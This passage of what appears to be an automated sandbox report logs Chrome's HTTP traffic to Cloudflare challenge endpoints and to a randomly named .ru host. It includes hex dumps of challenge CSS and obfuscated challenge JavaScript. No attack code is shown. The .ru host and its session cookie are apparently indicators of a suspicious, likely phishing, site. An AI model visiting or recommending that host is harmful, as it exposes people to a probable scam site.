                                                                                                                                                                                    Data Ascii: ink,.theme-dark #fr-helper-loop-link { color: #bbb;}.theme-dark #fr-helper-link:visited, .theme-dark #fr-helper-link:link,.theme-dark #fr-helper-loop-link:visited,.theme-dark #fr-helper-loop-link:link { color: #bbb;}.theme-dark #fr-helper-link:
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1369INData Raw: 6f 76 65 72 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 36 36 33 37 39 3b 0a 7d 0a 0a 23 6c 6f 67 6f 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 36 70 78 3b 0a 7d 0a 0a 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 31 36 36 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68
                                                                                                                                                                                    Data Ascii: over, #challenge-overlay a:focus,#challenge-error-text a:active,#challenge-error-text a:hover,#challenge-error-text a:focus { color: #166379;}#logo { margin-bottom: 1px; height: 26px;}.failure-circle { stroke-dasharray: 166; stroke-dash
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1369INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 6d 61 72 6b 3a 3a 61 66 74 65 72 20 7b 0a 20 20 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6c 65 66 74 3a 20 38 70 78 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 62 6f 72 64 65 72 3a 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 30 20 34 70 78 20 34 70 78 20 30 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 36 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 32 70 78 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63
                                                                                                                                                                                    Data Ascii: background-color: white;}.ctp-checkbox-label input:checked ~ .mark::after { top: 3px; left: 8px; transform: rotate(45deg) scale(1); border: solid #c44d0e; border-width: 0 4px 4px 0; border-radius: 0; width: 6px; height: 12px;}.ctp-chec
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1369INData Raw: 69 6e 3a 20 35 70 78 20 31 36 70 78 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 71 72 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 70 78 3b 0a 20 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 66 61 69 6c 20 7b 0a 20 20 64 69 73 70 6c 61 79
                                                                                                                                                                                    Data Ascii: in: 5px 16px 0; padding-right: 0; text-align: right;}.size-compact #terms { text-align: right;}.size-compact #qr { text-align: center;}.size-compact #challenge-error-title { margin-top: 3px; width: auto;}.size-compact #fail { display
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1369INData Raw: 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 66 61 69 6c 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 73 70 69 6e 6e 65 72 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0a 20 20 6d 61 72 67 69 6e
                                                                                                                                                                                    Data Ascii: rtl .size-compact #success-icon { left: 86px;}.rtl .size-compact #fail-icon { left: 86px;}.rtl .size-compact #spinner-icon { left: 86px;}.rtl .size-compact #expired-icon { left: 86px;}.rtl .size-compact #expired { margin-top: 0; margin


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    14192.168.2.1649738104.17.3.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:31 UTC710OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=84b92c841f99b127 HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/v8qzf/0x4AAAAAAAQlQKVshTj02gAC/auto/normal
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:31 UTC335INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:31 GMT
                                                                                                                                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92c87b845ad9a-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1034INData Raw: 37 65 36 30 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 61 2c 66 77 2c 66 78 2c 66 79 2c 66 7a 2c 66 44 2c 66 45 2c 67 32 2c 67 33 2c 67 61 2c 67 68 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67 4f 2c 67 50 2c 67 51 2c 67 52 2c 67 53 2c 67 54 2c 67 55 2c 67 56 2c 67 57 2c 67 58 2c 67 59 2c 67 5a 2c 68 30 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 37 2c 68 38 2c 68 39 2c 68 61 2c 68 62 2c 68 63 2c 68 65 2c 68 73 2c 68 46 2c 68 4b 2c 68 4c 2c 68 56 2c 69 34 2c
                                                                                                                                                                                    Data Ascii: 7e60window._cf_chl_opt.uaO=false;~function(ia,fw,fx,fy,fz,fD,fE,g2,g3,ga,gh,gn,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,gO,gP,gQ,gR,gS,gT,gU,gV,gW,gX,gY,gZ,h0,h1,h2,h3,h4,h5,h6,h7,h8,h9,ha,hb,hc,he,hs,hF,hK,hL,hV,i4,
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1369INData Raw: 27 6f 51 48 4c 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 77 48 42 6b 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 6e 55 4e 62 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 27 51 4d 6c 77 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 5a 41 57 6a 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 27 66 75 68 70 57 27 3a 69 62 28 38 35 33 29 2c 27 47 49 63 49 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 6f 7a 62 49 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                    Data Ascii: 'oQHLi':function(h,i){return h==i},'wHBkX':function(h,i){return h(i)},'nUNbb':function(h,i){return h!==i},'QMlwO':function(h,i){return h>i},'ZAWjY':function(h,i){return h!==i},'fuhpW':ib(853),'GIcIc':function(h,i){return h-i},'ozbIR':function(h,i){return
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1369INData Raw: 64 28 33 34 34 29 5d 28 4d 29 2c 4f 62 6a 65 63 74 5b 69 64 28 31 34 34 37 29 5d 5b 69 64 28 31 31 37 32 29 5d 5b 69 64 28 33 37 30 29 5d 28 44 2c 4e 29 7c 7c 28 44 5b 4e 5d 3d 48 2b 2b 2c 45 5b 4e 5d 3d 21 30 29 2c 4f 3d 64 5b 69 64 28 37 32 35 29 5d 28 46 2c 4e 29 2c 4f 62 6a 65 63 74 5b 69 64 28 31 34 34 37 29 5d 5b 69 64 28 31 31 37 32 29 5d 5b 69 64 28 33 37 30 29 5d 28 44 2c 4f 29 29 46 3d 4f 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 69 64 28 31 34 34 37 29 5d 5b 69 64 28 31 31 37 32 29 5d 5b 69 64 28 33 37 30 29 5d 28 45 2c 46 29 29 7b 69 66 28 32 35 36 3e 46 5b 69 64 28 37 38 35 29 5d 28 30 29 29 7b 66 6f 72 28 43 3d 30 3b 64 5b 69 64 28 33 31 38 29 5d 28 43 2c 49 29 3b 4b 3c 3c 3d 31 2c 4c 3d 3d 64 5b 69 64 28 32 30 33 37 29 5d 28 6f 2c 31
                                                                                                                                                                                    Data Ascii: d(344)](M),Object[id(1447)][id(1172)][id(370)](D,N)||(D[N]=H++,E[N]=!0),O=d[id(725)](F,N),Object[id(1447)][id(1172)][id(370)](D,O))F=O;else{if(Object[id(1447)][id(1172)][id(370)](E,F)){if(256>F[id(785)](0)){for(C=0;d[id(318)](C,I);K<<=1,L==d[id(2037)](o,1
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1369INData Raw: 50 3d 46 5b 69 64 28 37 38 35 29 5d 28 30 29 2c 43 3d 30 3b 31 36 3e 43 3b 4b 3d 64 5b 69 64 28 31 30 33 34 29 5d 28 64 5b 69 64 28 39 38 38 29 5d 28 4b 2c 31 29 2c 64 5b 69 64 28 39 30 33 29 5d 28 50 2c 31 29 29 2c 6f 2d 31 3d 3d 4c 3f 28 4c 3d 30 2c 4a 5b 69 64 28 36 35 36 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 47 2d 2d 2c 64 5b 69 64 28 39 31 39 29 5d 28 30 2c 47 29 26 26 28 47 3d 4d 61 74 68 5b 69 64 28 35 34 31 29 5d 28 32 2c 49 29 2c 49 2b 2b 29 2c 64 65 6c 65 74 65 20 45 5b 46 5d 7d 65 6c 73 65 20 66 6f 72 28 50 3d 44 5b 46 5d 2c 43 3d 30 3b 43 3c 49 3b 4b 3d 4b 3c 3c 31 7c 64 5b 69 64 28 31 34 38 31 29 5d 28 50 2c 31 29 2c 6f 2d 31 3d 3d 4c 3f 28 4c 3d 30 2c 4a 5b 69 64 28 36 35 36 29 5d 28 73 28
                                                                                                                                                                                    Data Ascii: P=F[id(785)](0),C=0;16>C;K=d[id(1034)](d[id(988)](K,1),d[id(903)](P,1)),o-1==L?(L=0,J[id(656)](s(K)),K=0):L++,P>>=1,C++);}G--,d[id(919)](0,G)&&(G=Math[id(541)](2,I),I++),delete E[F]}else for(P=D[F],C=0;C<I;K=K<<1|d[id(1481)](P,1),o-1==L?(L=0,J[id(656)](s(
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1369INData Raw: 69 68 28 33 34 36 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 69 68 28 36 34 34 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 69 68 28 31 35 36 33 29 5d 28 64 5b 69 68 28 31 37 39 37 29 5d 28 30 2c 4c 29 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4d 3d 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 68 28 35 34 31 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4c 3d 64 5b 69 68 28 31 34 38 31 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 64 5b 69 68 28 32 38 30 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 69 68 28 31 35 33 32 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 69 68 28 31 35 36 33 29 5d 28 30 3c 4c 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 64 5b
                                                                                                                                                                                    Data Ascii: ih(346)](0,H)&&(H=j,G=d[ih(644)](o,I++)),J|=d[ih(1563)](d[ih(1797)](0,L)?1:0,F),F<<=1);switch(M=J){case 0:for(J=0,K=Math[ih(541)](2,8),F=1;K!=F;L=d[ih(1481)](G,H),H>>=1,d[ih(280)](0,H)&&(H=j,G=d[ih(1532)](o,I++)),J|=d[ih(1563)](0<L?1:0,F),F<<=1);s[B++]=d[
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1369INData Raw: 5b 69 52 28 36 35 34 29 5d 26 26 28 76 3d 76 5b 69 52 28 31 32 36 30 29 5d 28 64 5b 69 52 28 31 34 39 30 29 5d 5b 69 52 28 36 35 34 29 5d 28 66 29 29 29 2c 76 3d 64 5b 69 52 28 31 33 30 37 29 5d 5b 69 52 28 39 39 32 29 5d 26 26 64 5b 69 52 28 31 39 35 30 29 5d 3f 64 5b 69 52 28 31 33 30 37 29 5d 5b 69 52 28 39 39 32 29 5d 28 6e 65 77 20 64 5b 28 69 52 28 31 39 35 30 29 29 5d 28 76 29 29 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 69 54 2c 46 29 7b 66 6f 72 28 69 54 3d 69 52 2c 45 5b 69 54 28 34 38 31 29 5d 28 29 2c 46 3d 30 3b 6f 5b 69 54 28 31 36 34 38 29 5d 28 46 2c 45 5b 69 54 28 31 39 30 38 29 5d 29 3b 45 5b 46 2b 31 5d 3d 3d 3d 45 5b 46 5d 3f 45 5b 69 54 28 31 37 37 38 29 5d 28 6f 5b 69 54 28 31 31 36 36 29 5d 28 46 2c 31 29 2c 31 29 3a 46 2b 3d 31 29 3b 72
                                                                                                                                                                                    Data Ascii: [iR(654)]&&(v=v[iR(1260)](d[iR(1490)][iR(654)](f))),v=d[iR(1307)][iR(992)]&&d[iR(1950)]?d[iR(1307)][iR(992)](new d[(iR(1950))](v)):function(E,iT,F){for(iT=iR,E[iT(481)](),F=0;o[iT(1648)](F,E[iT(1908)]);E[F+1]===E[F]?E[iT(1778)](o[iT(1166)](F,1),1):F+=1);r
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1369INData Raw: 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 65 3d 64 2c 66 3d 31 2c 67 3d 65 5b 6a 46 28 36 31 33 29 5d 28 31 65 33 2c 66 77 5b 6a 46 28 31 33 35 31 29 5d 5b 6a 46 28 31 37 36 37 29 5d 28 32 2e 34 33 3c 3c 66 2c 33 32 29 29 2c 66 77 5b 6a 46 28 31 35 33 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6a 47 29 7b 6a 47 3d 6a 46 2c 66 77 5b 6a 47 28 31 34 32 37 29 5d 26 26 28 66 77 5b 6a 47 28 31 34 34 32 29 5d 5b 6a 47 28 39 38 33 29 5d 28 29 2c 66 77 5b 6a 47 28 31 34 34 32 29 5d 5b 6a 47 28 31 33 30 30 29 5d 28 29 2c 66 77 5b 6a 47 28 39 38 30 29 5d 3d 21 21 5b 5d 2c 66 77 5b 6a 47 28 31 34 32 37 29 5d 5b 6a 47 28 31 33 38 33 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 65 5b 6a 47 28 31 37 37 39 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 66 77
                                                                                                                                                                                    Data Ascii: ction(h,i){return h*i},e=d,f=1,g=e[jF(613)](1e3,fw[jF(1351)][jF(1767)](2.43<<f,32)),fw[jF(1537)](function(jG){jG=jF,fw[jG(1427)]&&(fw[jG(1442)][jG(983)](),fw[jG(1442)][jG(1300)](),fw[jG(980)]=!![],fw[jG(1427)][jG(1383)]({'source':e[jG(1779)],'widgetId':fw
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1369INData Raw: 28 6a 5b 6a 48 28 31 35 38 36 29 5d 28 27 68 2f 27 2c 66 77 5b 6a 48 28 31 32 33 39 29 5d 5b 6a 48 28 39 32 33 29 5d 29 2c 27 2f 27 29 3a 27 27 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 39 27 3a 42 3d 68 7c 7c 6a 48 28 32 30 32 33 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 30 27 3a 6e 5b 6a 48 28 36 38 33 29 5d 3d 32 35 30 30 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 31 27 3a 69 66 28 21 6e 29 72 65 74 75 72 6e 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 32 27 3a 6e 5b 6a 48 28 35 37 36 29 5d 28 6f 2c 6d 2c 21 21 5b 5d 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 7d 63 61 74 63 68 28 43 29 7b 7d 7d 2c 66 77 5b 69 61 28 34 33 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 66 2c 67 2c 68 2c 6a 49 2c 69 2c 6a 2c 6b 2c 6c 2c 6d
                                                                                                                                                                                    Data Ascii: (j[jH(1586)]('h/',fw[jH(1239)][jH(923)]),'/'):'';continue;case'9':B=h||jH(2023);continue;case'10':n[jH(683)]=2500;continue;case'11':if(!n)return;continue;case'12':n[jH(576)](o,m,!![]);continue}break}}catch(C){}},fw[ia(430)]=function(d,e,f,g,h,jI,i,j,k,l,m
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1369INData Raw: 5e 6d 7d 2c 27 6d 67 58 58 68 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6d 5e 6c 7d 2c 27 49 6c 4b 59 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2d 6d 7d 2c 27 51 73 75 64 77 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 26 6d 7d 2c 27 4f 71 4a 53 62 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 28 6d 29 7d 2c 27 44 68 74 66 57 27 3a 6a 4e 28 31 34 30 31 29 2c 27 75 62 76 6d 41 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 3d 3d 3d 6d 7d 2c 27 48 46 45 75 4b 27 3a 6a 4e 28 31 37 35 33 29 2c 27 77 56 4b 77 74 27 3a 6a 4e 28 31 34 32 37 29 2c 27 56 6f 48 44 67 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72
                                                                                                                                                                                    Data Ascii: ^m},'mgXXh':function(l,m){return m^l},'IlKYo':function(l,m){return l-m},'Qsudw':function(l,m){return l&m},'OqJSb':function(l,m){return l(m)},'DhtfW':jN(1401),'ubvmA':function(l,m){return l===m},'HFEuK':jN(1753),'wVKwt':jN(1427),'VoHDg':function(l,m){retur
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1369INData Raw: 29 7b 69 66 28 66 77 5b 6a 55 28 31 34 34 32 29 5d 5b 6a 55 28 39 38 33 29 5d 28 29 2c 66 77 5b 6a 55 28 31 34 34 32 29 5d 5b 6a 55 28 31 33 30 30 29 5d 28 29 2c 66 77 5b 6a 55 28 39 38 30 29 5d 3d 21 21 5b 5d 2c 66 77 5b 66 5b 6a 55 28 31 30 31 38 29 5d 5d 29 7b 69 66 28 6a 55 28 36 38 38 29 3d 3d 3d 6a 55 28 36 38 38 29 29 66 77 5b 66 5b 6a 55 28 31 30 31 38 29 5d 5d 5b 6a 55 28 31 33 38 33 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 6a 55 28 31 35 32 35 29 2c 27 77 69 64 67 65 74 49 64 27 3a 66 77 5b 6a 55 28 31 32 33 39 29 5d 5b 6a 55 28 31 39 31 33 29 5d 2c 27 65 76 65 6e 74 27 3a 6a 55 28 31 32 36 38 29 2c 27 72 63 56 27 3a 66 77 5b 6a 55 28 31 32 33 39 29 5d 5b 6a 55 28 31 35 34 30 29 5d 2c 27 63 6f 64 65 27 3a 6d 2c 27 63 66 43 68 6c 4f 75 74 27 3a 66
                                                                                                                                                                                    Data Ascii: ){if(fw[jU(1442)][jU(983)](),fw[jU(1442)][jU(1300)](),fw[jU(980)]=!![],fw[f[jU(1018)]]){if(jU(688)===jU(688))fw[f[jU(1018)]][jU(1383)]({'source':jU(1525),'widgetId':fw[jU(1239)][jU(1913)],'event':jU(1268),'rcV':fw[jU(1239)][jU(1540)],'code':m,'cfChlOut':f


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    15192.168.2.1649739104.17.3.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:31 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/v8qzf/0x4AAAAAAAQlQKVshTj02gAC/auto/normal
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:31 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:31 GMT
                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    cache-control: max-age=2629800, public
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92c887f66b042-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:31 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                    Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                                                                                                                                                    2024-01-26 13:41:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    16192.168.2.1649728104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:31 UTC694OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/hIdlMLOfWxySOTr9FfmxCijqf/
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:32 UTC687INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:32 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    cache-control: private, no-cache, max-age=0
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: BYPASS
